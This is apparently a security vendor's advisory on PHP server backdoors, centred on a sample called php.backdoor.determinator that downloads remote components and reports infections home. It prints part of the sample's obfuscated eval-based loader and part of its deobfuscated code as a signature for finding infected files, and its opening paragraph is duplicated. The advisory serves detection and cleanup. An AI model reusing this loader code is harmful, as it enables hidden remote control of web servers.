Backdoors are server-side malicious scripts which are intended to perpetrate malicious acccess to the server. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
php.backdoor.determinator is heavily obfuscated backdoor capable of downloading and running remote malicious components as well as updating the remote server with the information about successfull infection. It updates the remote server with the information about the infected url, PHP version on the affected system and the version of the malware itself.
Affecting
Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).
Cleanup
Cleanup is done by deleting the malicious file, which can be found in your system by searching for the dump code below inside your files. Reviewing access logs for non-expected HTTP POSTs can point out the possible infected files.
You can also sign up with us and let our team remove the malware for you.
Dump
Part of the decrypting code:
/*versio:2.11*/$IlIlI=0;$GLOBALS['QQQ0'] = 'c0Y3VybAc;9X2luaXQ#YWxsb3dfdXJsX2ZvcGVu,;3MQ6fX3NldG9wdA87X2V4ZWM,aXw1Y2xvc2UPGltZyBzcmM9Ig5%dIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz47;_8ddw8(2b3Nvbi5pbgfa3RpcHAuY2g(c2lsYmVyLmRl8;{5WV85aOg~5%90ZGlzcGxheV9lcnJvcnM(eZGV0ZXJtaW5hdG9yZnRw!{*Mi4xMQcSWtjMnhUdjVBeTB3M2Q}aYmFzZTY0X2VuY29kZQdcYmFzZTY0X2RlY29kZQf(eaHR0cDovLw53SFRUUF9IT1NU.;SFRUUF9VU0VSX0FHRU5U.dW5pb2421&1c2VsZWN0#{e00!UkVRVUVTVF9VUkk!c)!dU0NSSVBUX05BTUU0}}UVVFUllfU1RSSU5H#%4e6&Pw6.6)e{L3RtcC8,0dL3RtcA&16VE1Q&^;VEVNUA4*(VE1QRElS80!dXBsb2FkX3RtcF9kaXI#8*LgdmVyc2lvaLQ3LXBocA;3}(SFRUUF9FWEVDUEhQ0bb3V0~b2s,c&4;2aHR0cA1fOi8v0!L3BnLnBocD91PQec9Jms9%;7@%JnQ9cGhwJnA9a%JnY92(6261736536345f6465636f6465';$IlIlI=pack('H*',substr($GLOBALS['QQQ0'], -26));if (!function_exists('Q000OQ0O')){function Q000OQ0O($Il, $QQ){$c=$GLOBALS['QQQ0']; $d=pack('H*',substr($GLOBALS['QQQ0'], -26)); return $d(substr($c, $Il, $QQ));}};eval($IlIlI(
Part of the deobfuscated code:
@ini_set("display_errors", 0); //display_errors
define("determinator", 1); //determinator
$IlI1lI = "ftp"; //ftp
$II1Il1 = "2.11"; //2.11
$Q0O0OQ = "Ikc2xTv5Ay0w3d"; //Ikc2xTv5Ay0w3d
$IlI1Il = "base64_encode"; //base64_encode
$Q0Q00Q = "base64_decode"; //base64_decode
$II11lI = "http://"; //http://
$II11lI .= strtolower(@$_SERVER["HTTP_HOST"]); //HTTP_HOST
$IIlIIl = @$_SERVER["HTTP_USER_AGENT"]; //HTTP_USER_AGENT